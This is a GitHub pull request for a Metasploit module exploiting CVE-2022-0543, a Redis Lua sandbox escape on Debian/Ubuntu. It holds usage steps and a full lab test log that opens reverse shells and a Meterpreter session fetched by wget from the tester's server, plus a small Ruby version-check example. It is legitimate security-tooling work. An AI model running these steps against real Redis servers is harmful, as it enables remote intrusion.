
Redis Sandbox Escape RCE (CVE-2022-0543) #16504

Merged
merged 5 commits into from Apr 27, 2022

Conversation

jbaines-r7

@jbaines-r7 jbaines-r7 commented Apr 26, 2022

This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. This has been exploited in the wild. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries.

On a typical redis deployment (not docker), this module achieves execution as the redis user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload.

Redis can be configured with authentication or not. This module will work with either configuration (provided you provide the correct authentication details). This vulnerability could theoretically be exploited across a few architectures: i386, arm, ppc, etc. However, the module only supports x86_64 (mostly due to the lack of test targets), which is likely to be the most popular version.

Failed Linting

I expect this to fail linting due to the has_check? call. However, this is required. See #13143

Other Weird Things

As mentioned above, the default Meterpreter is stageless due to the use of "MemoryDenyWriteExecute" otherwise causing the staged version to crash on failed mprotect. Technically, the Docker version could execute a staged Meterpreter but there is also no command stager (other than printf/echo and I don't want to make those options since they won't work in the normal case). And I guess I should clarify that means that target 1 does not work against the Docker target but does work against a normal Ubuntu install. I think this is fine since actually exploitable targets in the wild, in my opinion, are far more likely to be non-Docker targets.

Verification

Follow the setup steps in the documentation.

  • use exploit/linux/redis/redis_debian_sandbox_escape
  • set RHOST <ip>
  • set LHOST <ip>
  • If needed - set PASSWORD <password>
  • check
  • Verify the remote host is vulnerable.
  • run
  • Verify the module receives a reverse shell

PoC Video || GTFO

https://www.youtube.com/watch?v=N5J7laXlMuo

PCAP || GTFO

redis_exploitation.zip


@space-r7 space-r7 left a comment


Just a couple minor suggestions. Got it tested without auth:

Output
msf6 > use exploit/linux/redis/redis_debian_sandbox_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > options

Module options (exploit/linux/redis/redis_debian_sandbox_escape):

   Name       Current Setting                Required  Description
   ----       ---------------                --------  -----------
   LUA_LIB    /usr/lib/x86_64-linux-gnu/lib  yes       LUA library path
              lua5.1.so.0
   PASSWORD   mypassword                     no        Redis AUTH password
   RHOSTS                                    yes       The target host(s), see https://github.com/rapid7/me
                                                       tasploit-framework/wiki/Using-Metasploit
   RPORT      6379                           yes       The target port (TCP)
   SRVHOST    0.0.0.0                        yes       The local host or network interface to listen on. Th
                                                       is must be an address on the local machine or 0.0.0.
                                                       0 to listen on all addresses.
   SRVPORT    8080                           yes       The local port to listen on.
   SSLCert                                   no        Path to a custom SSL certificate (default is randoml
                                                       y generated)
   TARGETURI  /                              yes       Base path
   THREADS    1                              yes       The number of concurrent threads (max one per host)
   URIPATH                                   no        The URI to use for this exploit (default is random)


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set rhost 192.168.140.140
rhost => 192.168.140.140
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > check
[+] 192.168.140.140:6379 - The target is vulnerable. Successfully executed the 'id' command.
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] 192.168.140.140:6379  - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.140:6379  - The target is vulnerable. Successfully executed the 'id' command.
[*] 192.168.140.140:6379  - Executing Unix Command for cmd/unix/reverse_bash
[+] 192.168.140.140:6379  - Exploit complete!
[*] Command shell session 1 opened (192.168.140.1:4444 -> 192.168.140.140:48772 ) at 2022-04-26 13:24:42 -0500

id
uid=126(redis) gid=133(redis) groups=133(redis)
uname -a
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
^C  
Abort session 1? [y/N]  y

[*] 192.168.140.140 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > set target 1
target => 1
msf6 exploit(linux/redis/redis_debian_sandbox_escape) > run

[*] Started reverse TCP handler on 192.168.140.1:4444 
[*] 192.168.140.140:6379  - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.140.140:6379  - The target is vulnerable. Successfully executed the 'id' command.
[*] 192.168.140.140:6379  - Executing Linux Dropper for linux/x86/meterpreter_reverse_tcp
[*] 192.168.140.140:6379  - Using URL: http://192.168.140.1:8080/963M5aN
[*] 192.168.140.140:6379  - Client 192.168.140.140 (Wget/1.20.3 (linux-gnu)) requested /963M5aN
[*] 192.168.140.140:6379  - Sending payload to 192.168.140.140 (Wget/1.20.3 (linux-gnu))
[+] 192.168.140.140:6379  - Exploit complete!
[*] 192.168.140.140:6379  - Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.140.1:4444 -> 192.168.140.140:48774 ) at 2022-04-26 13:24:59 -0500
[*] 192.168.140.140:6379  - Server stopped.

meterpreter > getuid
Server username: redis
meterpreter > sysinfo
Computer     : 192.168.140.140
OS           : Ubuntu 20.04 (Linux 5.13.0-40-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

jbaines-r7 and others added 3 commits April 26, 2022 14:42
…_escape.md

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
# Before we get crazy sending exploits over the wire, let's just check if this could
# plausibly be a vulnerable version. Using INFO we can check for:
#
# 1. 4 < Version < 6.1

Maybe order those in the same order as the actual checks done below?
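The version pre-check quoted in the snippet above (4 < Version < 6.1, read from the INFO reply), as a stand-alone added example; this is not the module's own code, and the INFO reply it parses is a constructed sample modelled on the Ubuntu 20.04 host in the test transcript.

```ruby
# Added example: parse a Redis INFO reply and apply the module's version
# pre-check (4 < version < 6.1). Not part of the Metasploit module.

# INFO replies are "# Section" header lines and key:value lines, CRLF-separated.
def parse_redis_info(text)
  info = {}
  text.each_line do |line|
    line = line.strip
    next if line.empty? || line.start_with?('#')
    key, value = line.split(':', 2)
    info[key] = value if key && value
  end
  info
end

# The pre-check from the module's comment: plausibly affected when
# 4 < version < 6.1. Anything unparsable or outside the range is rejected.
def version_plausibly_affected?(version_string)
  return false unless version_string =~ /\A\d+(\.\d+)*\z/
  version = Gem::Version.new(version_string)
  version > Gem::Version.new('4') && version < Gem::Version.new('6.1')
end

# Constructed sample reply (not captured from a real host).
SAMPLE_INFO = "# Server\r\nredis_version:5.0.7\r\nredis_mode:standalone\r\n" \
              "os:Linux 5.13.0-40-generic x86_64\r\narch_bits:64\r\n\r\n" \
              "# Clients\r\nconnected_clients:1\r\n"

# Summarise what the pre-check can tell us about a host from its INFO reply.
# Note that INFO does not reveal the distribution, so this cannot confirm
# that the Debian/Ubuntu build of the Lua sandbox is in use.
def assess(info_text)
  info = parse_redis_info(info_text)
  version = info['redis_version']
  {
    version: version,
    arch_bits: info['arch_bits'],
    plausibly_affected: version_plausibly_affected?(version.to_s)
  }
end

if __FILE__ == $0
  p assess(SAMPLE_INFO)
end
```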

@space-r7 space-r7 self-assigned this Apr 27, 2022
@space-r7 space-r7 merged commit 75e5a32 into rapid7:master Apr 27, 2022
@space-r7

Release Notes

This exploit achieves remote code execution as the redis user via a sandbox escape in several Redis versions distributed through Debian-based Linux distributions.

@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 27, 2022